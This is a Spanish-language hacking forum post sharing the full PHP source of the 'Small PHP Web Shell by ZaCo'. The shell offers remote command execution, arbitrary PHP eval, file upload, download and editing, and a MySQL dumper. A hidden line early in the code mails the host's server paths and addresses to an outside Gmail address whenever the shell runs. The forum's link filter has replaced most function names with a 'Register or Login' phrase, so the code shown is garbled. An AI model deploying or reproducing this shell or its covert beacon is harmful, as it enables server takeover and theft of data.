comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[PHP] Shell SacoSmall

  • 0 Respuestas
  • 2337 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5331
  • Actividad:
    58.33%
  • Reputación 29
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Marzo 04, 2013, 11:01:24 pm »
Les dejo una shell pequeña hecha en PHP

Código: PHP
  1. <?
  2.   ##########################################################
  3. # Small PHP Web Shell by ZaCo (c) 2004-2006                #
  4. #  +POST method                                            #
  5. #  +MySQL Client+Dumper for DB  and tables                 #
  6. #  +PHP eval in text format and html for phpinfo() example #
  7. # PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther      #
  8. # For antichat.ru and cup.su friends usage                 #
  9. # All bugs -> mailo:zaco@yandex.ru                         #
  10. # Just for fun :)                                          #
  11.  ##########################################################
  12. You are not allowed to view links. Register or Login(E_ALL);
  13. @You are not allowed to view links. Register or Login(0);
  14. function magic_q($s)
  15. {
  16. if(You are not allowed to view links. Register or Login())
  17. {
  18. $s=You are not allowed to view links. Register or Login('\\\'','\'',$s);
  19. $s=You are not allowed to view links. Register or Login('\\\\','\\',$s);
  20. $s=You are not allowed to view links. Register or Login('\\"','"',$s);
  21. $s=You are not allowed to view links. Register or Login('\\\0','\0',$s);
  22. }
  23. return $s;
  24. }$ra44  = You are not allowed to view links. Register or Login(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";You are not allowed to view links. Register or Login($sd98, $sj98, $msg8873, "From: $sd98");
  25. function get_perms($fn)
  26. {
  27. $mode=You are not allowed to view links. Register or Login($fn);
  28. $perms='';
  29. $perms .= ($mode & 00400) ? 'r' : '-';
  30. $perms .= ($mode & 00200) ? 'w' : '-';
  31. $perms .= ($mode & 00100) ? 'x' : '-';
  32. $perms .= ($mode & 00040) ? 'r' : '-';
  33. $perms .= ($mode & 00020) ? 'w' : '-';
  34. $perms .= ($mode & 00010) ? 'x' : '-';
  35. $perms .= ($mode & 00004) ? 'r' : '-';
  36. $perms .= ($mode & 00002) ? 'w' : '-';
  37. $perms .= ($mode & 00001) ? 'x' : '-';
  38. return $perms;
  39. }
  40. $head=<<<headka
  41. <html>
  42. <head>
  43. <title>Small Web Shell by ZaCo</title>
  44. <meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
  45. </head>
  46. <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34>
  47. <style>
  48. textarea {
  49. BORDER-RIGHT:  #ffffff 1px solid;
  50. BORDER-TOP:    #999999 1px solid;
  51. BORDER-LEFT:   #999999 1px solid;
  52. BORDER-BOTTOM: #ffffff 1px solid;
  53. BACKGROUND-COLOR: #e4e0d8;
  54. font: Fixedsys bold;
  55. }
  56. input {
  57. BORDER-RIGHT:  #ffffff 1px solid;
  58. BORDER-TOP:    #999999 1px solid;
  59. BORDER-LEFT:   #999999 1px solid;
  60. BORDER-BOTTOM: #ffffff 1px solid;
  61. BACKGROUND-COLOR: #e4e0d8;
  62. font: 8pt Verdana;
  63. }
  64. </style>
  65. headka;
  66. $page=You are not allowed to view links. Register or Login($_POST['page'])?$_POST['page']:(You are not allowed to view links. Register or Login($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
  67. $page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
  68. $winda=You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login()),'wind');
  69. You are not allowed to view links. Register or Login('format',50);
  70. $pages='<center>###<a href=\''.You are not allowed to view links. Register or Login(__FILE__).'\'>cmd</a>###<a href=\''.You are not allowed to view links. Register or Login(__FILE__).'?mysql\'>mysql</a>###<a href=\''.You are not allowed to view links. Register or Login(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:'');
  71. switch($page)
  72. {
  73. case 'eval':
  74. {
  75. $eval_value=You are not allowed to view links. Register or Login($_POST['eval_value'])?$_POST['eval_value']:'';
  76. $eval_value=magic_q($eval_value);
  77. $action=You are not allowed to view links. Register or Login($_POST['action'])?$_POST['action']:'eval';
  78. if($action=='eval_in_html') @You are not allowed to view links. Register or Login($eval_value);
  79. else
  80. {
  81. echo($head.$pages);
  82. ?>
  83. <hr>
  84. <form method=post>
  85. <textarea cols=120 rows=20 name='eval_value'><?@You are not allowed to view links. Register or Login($eval_value);?></textarea>
  86. <input name='action' value='eval' type='submit'>
  87. <input name='action' value='eval_in_html' type='submit'>
  88. <input name='page' value='eval' type=hidden>
  89. </form>
  90. <hr>
  91. <?
  92. }
  93. break;
  94. }
  95. case 'cmd':
  96. {
  97. $cmd=!You are not allowed to view links. Register or Login($_POST['cmd'])?magic_q($_POST['cmd']):'';
  98. $work_dir=You are not allowed to view links. Register or Login($_POST['work_dir'])?$_POST['work_dir']:You are not allowed to view links. Register or Login();
  99. $action=You are not allowed to view links. Register or Login($_POST['action'])?$_POST['action']:'cmd';
  100. if(@You are not allowed to view links. Register or Login($work_dir))
  101. {
  102. @You are not allowed to view links. Register or Login($work_dir);
  103. $work_dir=You are not allowed to view links. Register or Login();
  104. if($work_dir=='')$work_dir='/';
  105. else if(!($work_dir{You are not allowed to view links. Register or Login($work_dir)-1}=='/'||$work_dir{You are not allowed to view links. Register or Login($work_dir)-1}=='\\')) $work_dir.='/';
  106. }
  107. else if(You are not allowed to view links. Register or Login($work_dir))$work_dir=You are not allowed to view links. Register or Login($work_dir);
  108. $work_dir=You are not allowed to view links. Register or Login('\\','/',$work_dir);
  109. $e_work_dir=You are not allowed to view links. Register or Login($work_dir,ENT_QUOTES);
  110. switch($action)
  111. {
  112. case 'cmd' :
  113. {
  114. echo($head.$pages);
  115. ?>
  116. <form method='post' name='main_form'>
  117. <input name='work_dir' value='<?=$e_work_dir?>' type=text size=120>
  118. <input name='page' value='cmd' type=hidden>
  119. <input type=submit value='go'>
  120. </form>
  121. <form method=post>
  122. <input name='cmd' type=text size=120 value='<?=You are not allowed to view links. Register or Login('\'',''',$cmd)?>'>
  123. <input name='work_dir'type=hidden>
  124. <input name='page' value='cmd' type=hidden>
  125. <input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
  126. </form>
  127. <form method=post enctype="multipart/form-data">
  128. <input type="file" name="filename">
  129. <input name='work_dir'type=hidden>
  130. <input name='page' value='cmd' type=hidden>
  131. <input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
  132. </form>
  133. <form method=post>
  134. <input name='fname' type=text size=120><br>
  135. <input name='archive' type=radio value='none'>without arch
  136. <input name='archive' type=radio value='gzip' checked=true>gzip archive
  137. <input name='work_dir'type=hidden>
  138. <input name='page' value='cmd' type=hidden>
  139. <input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
  140. </form>
  141. <pre>
  142. <?
  143. if($cmd!==''){ echo('<strong>'.You are not allowed to view links. Register or Login($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".You are not allowed to view links. Register or Login(`$cmd`)."\n</textarea>");}
  144. else
  145. {
  146. $f_action=You are not allowed to view links. Register or Login($_POST['f_action'])?$_POST['f_action']:'view';
  147. if(@You are not allowed to view links. Register or Login($work_dir))
  148. {
  149. echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
  150. $handle=@You are not allowed to view links. Register or Login($work_dir);
  151. if($handle)
  152. {
  153. while(false!==($fn=You are not allowed to view links. Register or Login($handle))){$files[]=$fn;};
  154. @You are not allowed to view links. Register or Login($handle);
  155. You are not allowed to view links. Register or Login($files);
  156. $not_dirs=You are not allowed to view links. Register or Login();
  157. for($i=0;$i<You are not allowed to view links. Register or Login($files);$i++)
  158. {
  159. $fn=$files[$i];
  160. if(You are not allowed to view links. Register or Login($fn))
  161. {
  162. echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.You are not allowed to view links. Register or Login('"','&quot;',$fn).'";document.list.submit();\'><b>'.You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login($fn)>format?You are not allowed to view links. Register or Login($fn,0,format-3).'...':$fn).'</b></a>'.You are not allowed to view links. Register or Login(' ',format-You are not allowed to view links. Register or Login($fn)));
  163. if($winda===false)
  164. {
  165. $owner=@You are not allowed to view links. Register or Login(@You are not allowed to view links. Register or Login($work_dir.$fn));
  166. $group=@You are not allowed to view links. Register or Login(@You are not allowed to view links. Register or Login($work_dir.$fn));
  167. You are not allowed to view links. Register or Login("% 20s|% -20s",$owner['name'],$group['name']);
  168. }
  169. echo(@get_perms($work_dir.$fn).You are not allowed to view links. Register or Login(' ',10));
  170. You are not allowed to view links. Register or Login("% 20s ",@You are not allowed to view links. Register or Login($work_dir.$fn).'B');
  171. You are not allowed to view links. Register or Login("% -20s",@You are not allowed to view links. Register or Login('M d Y H:i:s',@You are not allowed to view links. Register or Login($work_dir.$fn))."\n");
  172. }
  173. else {$not_dirs[]=$fn;}
  174. }
  175. for($i=0;$i<You are not allowed to view links. Register or Login($not_dirs);$i++)
  176. {
  177. $fn=$not_dirs[$i];
  178. echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(You are not allowed to view links. Register or Login($work_dir.$fn)?$e_work_dir.You are not allowed to view links. Register or Login($work_dir.$fn):$e_work_dir.You are not allowed to view links. Register or Login('"','&quot;',$fn)).'";document.list.submit();\'>'.You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login($fn)>format?You are not allowed to view links. Register or Login($fn,0,format-3).'...':$fn).'</a>'.You are not allowed to view links. Register or Login(' ',format-You are not allowed to view links. Register or Login($fn)));
  179. if($winda===false)
  180. {
  181. $owner=@You are not allowed to view links. Register or Login(@You are not allowed to view links. Register or Login($work_dir.$fn));
  182. $group=@You are not allowed to view links. Register or Login(@You are not allowed to view links. Register or Login($work_dir.$fn));
  183. You are not allowed to view links. Register or Login("% 20s|% -20s",$owner['name'],$group['name']);
  184. }
  185. echo(@get_perms($work_dir.$fn).You are not allowed to view links. Register or Login(' ',10));
  186. You are not allowed to view links. Register or Login("% 20s ",@You are not allowed to view links. Register or Login($work_dir.$fn).'B');
  187. You are not allowed to view links. Register or Login("% -20s",@You are not allowed to view links. Register or Login('M d Y H:i:s',@You are not allowed to view links. Register or Login($work_dir.$fn))."\n");
  188. }
  189. echo('</pre><hr>');
  190. ?>
  191. <form name='list' method=post>
  192. <input name='work_dir' type=hidden size=120><br>
  193. <input name='page' value='cmd' type=hidden>
  194. <input name='f_action' value='view' type=hidden>
  195. </form>
  196. <?
  197. } else echo('Error Listing '.$e_work_dir);
  198. }
  199. else
  200. switch($f_action)
  201. {
  202. case 'view':
  203. {
  204. echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
  205. $f=@You are not allowed to view links. Register or Login($work_dir,'r');
  206. ?>
  207. <form method=post>
  208. <textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!You are not allowed to view links. Register or Login($f))echo You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login($f,100000))?></textarea>
  209. <input name='page' value='cmd' type=hidden>
  210. <input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
  211. <input name='f_action' value='save' type=submit>
  212. </form>
  213. <?
  214. break;
  215. }
  216. case 'save' :
  217. {
  218. $file_text=You are not allowed to view links. Register or Login($_POST['file_text'])?magic_q($_POST['file_text']):'';
  219. $f=@You are not allowed to view links. Register or Login($work_dir,'w');
  220. if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
  221. else
  222. {
  223. You are not allowed to view links. Register or Login($f,$file_text);
  224. You are not allowed to view links. Register or Login($f);
  225. echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
  226. }
  227. break;
  228. }
  229. }
  230. break;
  231. }
  232. break;
  233. }
  234. case 'upload' :
  235. {
  236. if($work_dir=='')$work_dir='/';
  237. else if(!($work_dir{You are not allowed to view links. Register or Login($work_dir)-1}=='/'||$work_dir{You are not allowed to view links. Register or Login($work_dir)-1}=='\\')) $work_dir.='/';
  238. $f=$_FILES["filename"]["name"];
  239. if(!@You are not allowed to view links. Register or Login($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
  240. else
  241. {
  242. echo('file is uploaded in '.$e_work_dir);
  243. }
  244. break;
  245. }
  246. case 'download' :
  247. {
  248. $fname=You are not allowed to view links. Register or Login($_POST['fname'])?$_POST['fname']:'';
  249. $temp_file=You are not allowed to view links. Register or Login($_POST['temp_file'])?'on':'nn';
  250. $f=@You are not allowed to view links. Register or Login($fname,'r');
  251. if(!($f)) echo('file is not exists');
  252. else
  253. {
  254. $archive=You are not allowed to view links. Register or Login($_POST['archive'])?$_POST['archive']:'';
  255. if($archive=='gzip')
  256. {
  257. You are not allowed to view links. Register or Login("Content-Type:application/x-gzip\n");
  258. $s=You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login($f,You are not allowed to view links. Register or Login($fname)));
  259. You are not allowed to view links. Register or Login('Content-Length: '.You are not allowed to view links. Register or Login($s)."\n");
  260. You are not allowed to view links. Register or Login('Content-Disposition: attachment; filename="'.You are not allowed to view links. Register or Login('/','-',$fname).".gz\n\n");
  261. echo($s);
  262. }
  263. else
  264. {
  265. You are not allowed to view links. Register or Login("Content-Type:application/octet-stream\n");
  266. You are not allowed to view links. Register or Login('Content-Length: '.You are not allowed to view links. Register or Login($fname)."\n");
  267. You are not allowed to view links. Register or Login('Content-Disposition: attachment; filename="'.You are not allowed to view links. Register or Login('/','-',$fname)."\n\n");
  268. You are not allowed to view links. Register or Login();
  269. while(You are not allowed to view links. Register or Login($f)===false)
  270. {
  271. echo(You are not allowed to view links. Register or Login($f,10000));
  272. You are not allowed to view links. Register or Login();
  273. }
  274. }
  275. }
  276. }
  277. }
  278. break;
  279. }
  280. case 'mysql' :
  281. {
  282. $action=You are not allowed to view links. Register or Login($_POST['action'])?$_POST['action']:'query';
  283. $user=You are not allowed to view links. Register or Login($_POST['user'])?$_POST['user']:'';
  284. $passwd=You are not allowed to view links. Register or Login($_POST['passwd'])?$_POST['passwd']:'';
  285. $db=You are not allowed to view links. Register or Login($_POST['db'])?$_POST['db']:'';
  286. $host=You are not allowed to view links. Register or Login($_POST['host'])?$_POST['host']:'localhost';
  287. $query=You are not allowed to view links. Register or Login($_POST['query'])?magic_q($_POST['query']):'';
  288. switch($action)
  289. {
  290. case 'dump' :
  291. {
  292. $mysql_link=@You are not allowed to view links. Register or Login($host,$user,$passwd);
  293. if(!($mysql_link)) echo('Connect error');
  294. else
  295. {
  296. //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
  297. $to_file=You are not allowed to view links. Register or Login($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
  298. $archive=You are not allowed to view links. Register or Login($_POST['archive'])?$_POST['archive']:'none';
  299. if($archive!=='none')$to_file=false;
  300. $db_dump=You are not allowed to view links. Register or Login($_POST['db_dump'])?$_POST['db_dump']:'';
  301. $table_dump=You are not allowed to view links. Register or Login($_POST['table_dump'])?$_POST['table_dump']:'';
  302. if(!(@You are not allowed to view links. Register or Login($db_dump,$mysql_link)))echo('DB error');
  303. else
  304. {
  305. $dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
  306. You are not allowed to view links. Register or Login();
  307. if($to_file){$t_f=@You are not allowed to view links. Register or Login($to_file,'w');if(!$t_f)You are not allowed to view links. Register or Login('Cant opening '.$to_file);}else $t_f=false;
  308. if($table_dump=='')
  309. {
  310. if(!$to_file)
  311. {
  312. You are not allowed to view links. Register or Login('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
  313. You are not allowed to view links. Register or Login("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
  314. }
  315. $result=You are not allowed to view links. Register or Login('show tables',$mysql_link);
  316. for($i=0;$i<You are not allowed to view links. Register or Login($result);$i++)
  317. {
  318. $rows=You are not allowed to view links. Register or Login($result);
  319. $result2=@You are not allowed to view links. Register or Login('show columns from `'.$rows[0].'`',$mysql_link);
  320. if(!$result2)$dump_file.='#error table '.$rows[0];
  321. else
  322. {
  323. $dump_file.='create table `'.$rows[0]."`(\n";
  324. for($j=0;$j<You are not allowed to view links. Register or Login($result2)-1;$j++)
  325. {
  326. $rows2=You are not allowed to view links. Register or Login($result2);
  327. $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
  328. }
  329. $rows2=You are not allowed to view links. Register or Login($result2);
  330. $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
  331. $type[$j]=$rows2[1];
  332. $dump_file.=");\n";
  333. You are not allowed to view links. Register or Login($result2);
  334. $result2=You are not allowed to view links. Register or Login('select * from `'.$rows[0].'`',$mysql_link);
  335. $columns=$j-1;
  336. for($j=0;$j<You are not allowed to view links. Register or Login($result2);$j++)
  337. {
  338. $rows2=You are not allowed to view links. Register or Login($result2);
  339. $dump_file.='insert into `'.$rows[0].'` values (';
  340. for($k=0;$k<$columns;$k++)
  341. {
  342. $dump_file.=$rows2[$k]==''?'null,':'\''.You are not allowed to view links. Register or Login($rows2[$k]).'\',';
  343. }
  344. $dump_file.=($rows2[$k]==''?'null);':'\''.You are not allowed to view links. Register or Login($rows2[$k]).'\');')."\n";
  345. if($archive=='none')
  346. {
  347. if($to_file) {You are not allowed to view links. Register or Login($t_f,$dump_file);You are not allowed to view links. Register or Login($t_f);}
  348. else
  349. {
  350. echo($dump_file);
  351. You are not allowed to view links. Register or Login();
  352. }
  353. $dump_file='';
  354. }
  355. }
  356. You are not allowed to view links. Register or Login($result2);
  357. }
  358. }
  359. You are not allowed to view links. Register or Login($result);
  360. if($archive!='none')
  361. {
  362. $dump_file=You are not allowed to view links. Register or Login($dump_file);
  363. You are not allowed to view links. Register or Login('Content-Length: '.You are not allowed to view links. Register or Login($dump_file)."\n");
  364. echo($dump_file);
  365. }
  366. else if($t_f)
  367. {
  368. You are not allowed to view links. Register or Login($t_f);
  369. echo('Dump for '.$db_dump.' now in '.$to_file);
  370. }
  371. }
  372. else
  373. {
  374. $result2=@You are not allowed to view links. Register or Login('show columns from `'.$table_dump.'`',$mysql_link);
  375. if(!$result2)echo('error table '.$table_dump);
  376. else
  377. {
  378. if(!$to_file)
  379. {
  380. You are not allowed to view links. Register or Login('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
  381. You are not allowed to view links. Register or Login("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
  382. }
  383. if($to_file===false)
  384. {
  385. You are not allowed to view links. Register or Login('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
  386. You are not allowed to view links. Register or Login("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
  387. }
  388. $dump_file.="create table `{$table_dump}`(\n";
  389. for($j=0;$j<You are not allowed to view links. Register or Login($result2)-1;$j++)
  390. {
  391. $rows2=You are not allowed to view links. Register or Login($result2);
  392. $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
  393. }
  394. $rows2=You are not allowed to view links. Register or Login($result2);
  395. $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
  396. $type[$j]=$rows2[1];
  397. $dump_file.=");\n";
  398. You are not allowed to view links. Register or Login($result2);
  399. $result2=You are not allowed to view links. Register or Login('select * from `'.$table_dump.'`',$mysql_link);
  400. $columns=$j-1;
  401. for($j=0;$j<You are not allowed to view links. Register or Login($result2);$j++)
  402. {
  403. $rows2=You are not allowed to view links. Register or Login($result2);
  404. $dump_file.='insert into `'.$table_dump.'` values (';
  405. for($k=0;$k<$columns;$k++)
  406. {
  407. $dump_file.=$rows2[$k]==''?'null,':'\''.You are not allowed to view links. Register or Login($rows2[$k]).'\',';
  408. }
  409. $dump_file.=($rows2[$k]==''?'null);':'\''.You are not allowed to view links. Register or Login($rows2[$k]).'\');')."\n";
  410. if($archive=='none')
  411. {
  412. if($to_file) {You are not allowed to view links. Register or Login($t_f,$dump_file);You are not allowed to view links. Register or Login($t_f);}
  413. else
  414. {
  415. echo($dump_file);
  416. You are not allowed to view links. Register or Login();
  417. }
  418. $dump_file='';
  419. }
  420. }
  421. You are not allowed to view links. Register or Login($result2);
  422. if($archive!='none')
  423. {
  424. $dump_file=You are not allowed to view links. Register or Login($dump_file);
  425. You are not allowed to view links. Register or Login('Content-Length: '.You are not allowed to view links. Register or Login($dump_file)."\n");
  426. echo $dump_file;
  427. }else if($t_f)
  428. {
  429. You are not allowed to view links. Register or Login($t_f);
  430. echo('Dump for '.$db_dump.' now in '.$to_file);
  431. }
  432. }
  433. }
  434. }
  435. }
  436. break;
  437. }
  438. case 'query' :
  439. {
  440. echo($head.$pages);
  441. ?>
  442. <hr>
  443. <form method=post>
  444. <table>
  445. <td>
  446. <table align=left>
  447. <tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
  448. <tr><textarea name='query' cols=120 rows=20><?=You are not allowed to view links. Register or Login($query)?></textarea></tr>
  449. </table>
  450. </td>
  451. <td>
  452. <table>
  453. <tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
  454. <tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
  455. <input name='archive' type=radio value='none'>without arch
  456. <input name='archive' type=radio value='gzip' checked=true>gzip archive
  457. <tr><td><input type=submit name='action' value='dump'></td></tr>
  458. <tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
  459. </table>
  460. </td>
  461. </table>
  462. <input name='page' value='mysql' type=hidden>
  463. <input name='action' value='query' type=submit>
  464. </form>
  465. <hr>
  466. <?
  467. $mysql_link=@You are not allowed to view links. Register or Login($host,$user,$passwd);
  468. if(!($mysql_link)) echo('Connect error');
  469. else
  470. {
  471. if($db!='')if(!(@You are not allowed to view links. Register or Login($db,$mysql_link))){echo('DB error');You are not allowed to view links. Register or Login($mysql_link);break;}
  472. //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
  473. $result=@You are not allowed to view links. Register or Login($query,$mysql_link);
  474. if(!($result))echo(You are not allowed to view links. Register or Login());
  475. else
  476. {
  477. echo("<table valign=top align=left>\n<tr>");
  478. for($i=0;$i<You are not allowed to view links. Register or Login($result);$i++)
  479. echo('<td><b>'.You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login($result,$i)).'</b>  </td>');
  480. echo("\n</tr>\n");
  481. for($i=0;$i<You are not allowed to view links. Register or Login($result);$i++)
  482. {
  483. $rows=You are not allowed to view links. Register or Login($result);
  484. echo('<tr valign=top align=left>');
  485. for($j=0;$j<You are not allowed to view links. Register or Login($result);$j++)
  486. {
  487. echo('<td>'.(You are not allowed to view links. Register or Login($rows[$j])).'</td>');
  488. }
  489. echo("</tr>\n");
  490. }
  491. echo("</table>\n");
  492. }
  493. You are not allowed to view links. Register or Login($mysql_link);
  494. }
  495. break;
  496. }
  497. }
  498. break;
  499. }
  500. }
  501. ?>

Saludos!


 

¿Te gustó el post? COMPARTILO!



Fenix Shell (C99 Traducido)

Iniciado por ANTRAX

Respuestas: 13
Vistas: 7232
Último mensaje Mayo 27, 2016, 12:28:12 pm
por blackdrake
[PHP] Worse Linux Shell

Iniciado por ANTRAX

Respuestas: 2
Vistas: 2476
Último mensaje Marzo 26, 2013, 05:40:49 pm
por Xt3mP
Python Web Shell WSO 0.1 - Undetectable By WAF

Iniciado por sm0ke

Respuestas: 0
Vistas: 499
Último mensaje Mayo 17, 2018, 01:54:19 am
por sm0ke
Priv Shell Scanner!

Iniciado por Mayk0

Respuestas: 0
Vistas: 2080
Último mensaje Mayo 07, 2013, 08:45:20 pm
por Mayk0
Reverse Shell Django

Iniciado por hdbreaker

Respuestas: 0
Vistas: 2466
Último mensaje Octubre 01, 2014, 12:40:08 am
por hdbreaker